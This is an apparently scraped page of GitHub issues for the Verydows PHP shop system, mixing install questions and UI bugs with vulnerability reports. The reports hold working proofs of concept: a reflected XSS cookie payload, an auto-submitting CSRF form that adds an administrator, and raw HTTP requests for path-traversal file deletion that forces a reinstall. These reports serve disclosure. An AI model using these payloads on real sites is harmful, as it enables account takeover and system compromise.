verytops / verydows Goto Github PK
View Code? Open in Web Editor NEWB2C商城系统 PC端+H5移动端 + 微信端 快速为你构建自己的商城系统
Home Page: http://demo.verydows.com
License: Other
B2C商城系统 PC端+H5移动端 + 微信端 快速为你构建自己的商城系统
Home Page: http://demo.verydows.com
License: Other
请问微信端怎样设置
WARNING: require(C:\xampp0\htdocs\vdows\vendor/autoload.php): failed to open stream: No such file or directory in C:\xampp0\htdocs\vdows\protected\include\core.php on line 18.
could someone help me get this installed?
Environment installed from verydows-master
In page localhost/index.php?c=main&a=index, the Get function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse
Payload used: <script>alert(document.cookie)</script>
Affected URL: http://localhost/index.php?c=main&a=index%3Cscript%3Ealert(document.cookie)%3C/script%3E
Navigate to the Affected URL, Payload would be triggered.
Payload used - <script>alert(document.cookie);</script>
Upload a png file in the background file management office, you can rename it to a php file
后台右上角的"设置"按钮覆盖整个后台页面. 每次需要点击后退回到后台.
Warning: file_put_contents(/www/wwwroot/aisuyuki.xyz/protected/config.php): failed to open stream: Permission denied in /www/wwwroot/aisuyuki.xyz/install/resources/function.php on line 195
Warning: file_put_contents(/www/wwwroot/aisuyuki.xyz/protected/cache/setting.php): failed to open stream: Permission denied in /www/wwwroot/aisuyuki.xyz/install/resources/function.php on line 204
There is a CSRF vulnerability that allows information and other operations to be changed
http://dcbang.net/QQ.PNG
POC:
`
public/theme/frontend/default/js/general.js : $.fn.vdsConfirm 方法里面的209行,多次调用的话,对button重复绑定事件,以致最后确定的时候触发了N个事件。
解决方法:
应在208行追加一行:
$confirm.find('button').unbind('click');
首页及后台都提示同样问题
A CSRF vulnerability was found in this cms.
Logged-in administrator user may add another administrator account by clicking following POC
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<input type=text name="username" value="TomAPU" />
<input type=text name="password" value="123456" />
<input type=text name="resetpwd" value="1" />
<input type=text name="repassword" value="123456" />
<input type=text name="name" value="TomAPU" />
<input type=text name="email" value="[email protected]" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
Vulnerability file: \protected\controller\backend\file_controller.php
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file
Vulnerability to reproduce:
POST /index.php?m=backend&c=file&a=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
path[]=../install/installed.lock
3、Click Send Packet,you can see that the file was deleted successfully
4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page
Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page
Repair suggestion:
这个.htaccess 貌似无法过滤
Vulnerable file: \protected\controller\backend\database_controller.php
It can be clearly seen that $file is not security filtered
Vulnerable code:
....................................................
..................................................
Vulnerability to reproduce:
1、First log in to the background to get the cookie
2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:
POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
file%5B%5D=../../../install/installed.lock
3、Click to send the data package, you can see that the file was deleted successfully
4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page
So as long as we delete the installed.lock file, we can reinstall the system,When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page
Repair suggestion:
1、Filter ../ or ..\ in the file variable
2、Limit the scope of deleted files or directories
后台设置数据缓存周期为0时,页面还是取的缓存数据。
跟描述不一致:“前台控制器中使用数据缓存的更新周期(秒),设置为"0"则表示不使用缓存”。
为何管理员和用户的信息分开记录,不合并一起? 合并一起登录应该更方便。
比如:LOGO之类的
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.